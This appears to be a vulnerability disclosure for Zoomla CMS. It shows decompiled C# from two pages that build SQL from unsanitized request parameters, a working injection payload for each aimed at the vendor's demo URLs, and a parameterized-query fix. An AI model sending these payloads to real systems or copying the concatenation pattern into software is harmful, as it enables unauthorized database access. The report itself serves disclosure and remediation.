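2014-05-09: Details reported to the vendor, awaiting vendor handling
2014-05-09: Vendor confirmed; details disclosed to the vendor only
2014-05-12: Details opened to third-party security partners
2014-07-03: Details disclosed to core white hats and experts in related fields
2014-07-13: Details disclosed to regular white hats
2014-07-23: Details disclosed to intern white hats
2014-08-07: Details disclosed to the public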
The latest version of Zoomla (逐浪) CMS was released in April 2014.
Address:
http://demo.zoomla.cn/Guest/ask/List.aspx
The source code is as follows:
    protected void Page_Load(object sender, EventArgs e)
    {
        string str = "";
        if (!base.IsPostBack)
        {
            DataTable table;
            if (this.b_User.CheckLogin())
            {
                this.user.Text = this.b_User.GetLogin().UserName;
                string userName = this.b_User.GetLogin().UserName;
                str = " And UserName<>'" + userName + "'";
            }
            if (!string.IsNullOrEmpty(base.Request["strWhere"]))
            {
                table = this.b_Ask.Sel("Qcontent LIKE '%" + base.Request["strWhere"] + "%'" + str + " And Status=1", " AddTime desc"); // parameter is not sanitized
            }
            else if (string.IsNullOrEmpty(base.Request["strWhere"]) && !string.IsNullOrEmpty(base.Request["QueType"]))
            {
                table = this.b_Ask.Sel("QueType LIKE '%" + base.Request["QueType"] + "%' " + str + " And Status=1", " AddTime desc"); // not sanitized here either
            }
            else
            {
                table = this.b_Ask.Sel("Status=1 " + str, " AddTime desc");
            }
            string str3 = "";
            string item = "";
            IList<string> list = new List<string>();
            Repeater repeater = new Repeater();
            if (table != null)
            {
                foreach (DataRow row in table.Rows)
                {
                    if (string.IsNullOrEmpty(str3))
                    {
                        item = row["Qcontent"].ToString();
                        list.Add(item);
                    }
                }
            }
            repeater.DataSource = list;
            repeater.DataBind();
            if (table != null)
            {
                this.Bind(table);
            }
            if (table != null)
            {
                table.Dispose();
            }
            list.Clear();
        }
    }
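Second SQL injection: the fix for the issue submitted earlier in February (WooYun: Zoomla CMS generic SQL injection vulnerability) was incomplete, and the injection still exists.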
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!base.IsPostBack)
        {
            DataTable table;
            string str = base.Request["ID"];
            string strWhere = "";
            if (this.b_User.CheckLogin())
            {
                string userName = this.b_User.GetLogin().UserName;
                this.user.Text = userName;
                strWhere = " UserName='" + userName + "'";
            }
            if (string.IsNullOrEmpty(base.Request["QueType"]) && string.IsNullOrEmpty(str))
            {
                table = this.b_Ask.Sel(strWhere, "");
            }
            else if (string.IsNullOrEmpty(base.Request["QueType"]) && !string.IsNullOrEmpty(str))
            {
                table = this.b_Ask.Sel(strWhere + " and ID=" + str, "");
            }
            else
            {
                table = this.b_Ask.Sel(" QueType like'%" + base.Request["QueType"].ToString() + "%'" + strWhere, ""); // injection exists here
            }
            string str5 = "";
            string item = "";
            IList<string> list = new List<string>();
            Repeater repeater = new Repeater();
            if (table != null)
            {
                foreach (DataRow row in table.Rows)
                {
                    if (string.IsNullOrEmpty(str5))
                    {
                        item = row["Qcontent"].ToString();
                        list.Add(item);
                    }
                }
            }
            repeater.DataSource = list;
            repeater.DataBind();
            if (table != null)
            {
                this.Bind(table);
            }
            if (table != null)
            {
                table.Dispose();
            }
            list.Clear();
        }
    }
Visit
Submit via POST:
strWhere=%' and (select @@version) >0 and '%'='
Second SQL injection:
http://demo.zoomla.cn/Guest/ask/MyAskList.aspx
Submit:
QueType=' and (select @@version)>0 and '%'='
Fix it again.
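One way to fix both pages, shown as an added example and not Zoomla's own code: bind strWhere and QueType as LIKE parameters and parse ID as an integer, so request values never become part of the SQL text. The table name AskTable, the class and method names, and the merging of both pages' filters into one builder are assumptions; the code targets .NET Framework's System.Data.SqlClient and only builds the command, without opening a connection.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text;

static class AskQueryExample
{
    // Make %, _ and [ literal inside a T-SQL LIKE pattern.
    static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // "AskTable" is a placeholder; the real table name is not shown in the report.
    public static SqlCommand BuildSearch(string strWhere, string queType, string id)
    {
        var cmd = new SqlCommand();
        var sql = new StringBuilder("SELECT * FROM AskTable WHERE Status = 1");
        if (!string.IsNullOrEmpty(strWhere))
        {
            sql.Append(" AND Qcontent LIKE @q");
            cmd.Parameters.Add("@q", SqlDbType.NVarChar).Value = "%" + EscapeLike(strWhere) + "%";
        }
        else if (!string.IsNullOrEmpty(queType))
        {
            sql.Append(" AND QueType LIKE @t");
            cmd.Parameters.Add("@t", SqlDbType.NVarChar).Value = "%" + EscapeLike(queType) + "%";
        }
        if (!string.IsNullOrEmpty(id))
        {
            // ID is numeric: refuse anything that is not an integer.
            int askId;
            if (!int.TryParse(id, out askId)) throw new ArgumentException("ID must be an integer");
            sql.Append(" AND ID = @id");
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = askId;
        }
        cmd.CommandText = sql.Append(" ORDER BY AddTime DESC").ToString();
        return cmd;
    }

    static void Main()
    {
        // Constructed input: the strWhere value quoted in the report.
        var cmd = BuildSearch("%' and (select @@version) >0 and '%'='", null, null);
        Console.WriteLine(cmd.CommandText);
        foreach (SqlParameter p in cmd.Parameters)
            Console.WriteLine(p.ParameterName + " = " + p.Value);
    }
}
```

With the reported strWhere value, the command text stays fixed and the whole input, quotes and wildcards included, ends up inside the @q parameter as a literal search string.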
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2014-05-09 17:19
Thanks
None yet